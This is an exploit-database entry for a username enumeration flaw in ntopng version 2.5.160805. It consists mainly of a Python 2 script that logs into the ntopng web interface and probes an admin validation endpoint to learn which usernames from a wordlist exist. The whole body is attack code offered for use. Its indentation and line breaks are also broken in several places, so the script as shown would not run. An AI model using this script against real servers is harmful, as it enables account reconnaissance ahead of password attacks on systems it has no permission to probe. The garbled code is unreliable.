###########################

# ntop-ng 2.5.160805 Username Enumeration Vulnerability

###########################

# Exploit title: ntopng user enumeration
# Author: Dolev Farhi
# Contact: dolevf at protonmail.com
# Date: 04-08-2016
# Vendor homepage: ntop.org
# Software version: v.2.5.160805
 
#!/usr/env/python
import os
import sys
import urllib
import urllib2
import cookielib
 
server = 'ip.add.re.ss'
username = 'ntopng-user'
password = 'ntopng-password'
timeout = 6
 
if len(sys.argv) < 2:
    print("usage: %s <usernames file>") % sys.argv[0]
    sys.exit(1)
 
if not os.path.isfile(sys.argv[1]):
    print("%s doesn't exist") % sys.argv[1]
    sys.exit(1)
 
try:
    cj = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    login_data = urllib.urlencode({'user' : username, 'password' :
password, 'referer' : '/authorize.html'})
    opener.open('http://' + server + ':3000/authorize.html', login_data,
timeout=timeout)
    print("\nEnumerating ntopng...\n")
    with open(sys.argv[1]) as f:
    for user in f:
        user = user.strip()
        url = 'http://%s:3000/lua/admin/validate_new_user.lua?user=%s&netw
orks=0.0.0.0/0,::/0' % (server, user)
          resp = opener.open(url)
        if "existing" not in resp.read():
            print "[NOT FOUND] %s" % user
        else:
            print "[FOUND] %s" % user
except Exception as e:
    print e
    sys.exit(1)

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2016-12-20]

###########################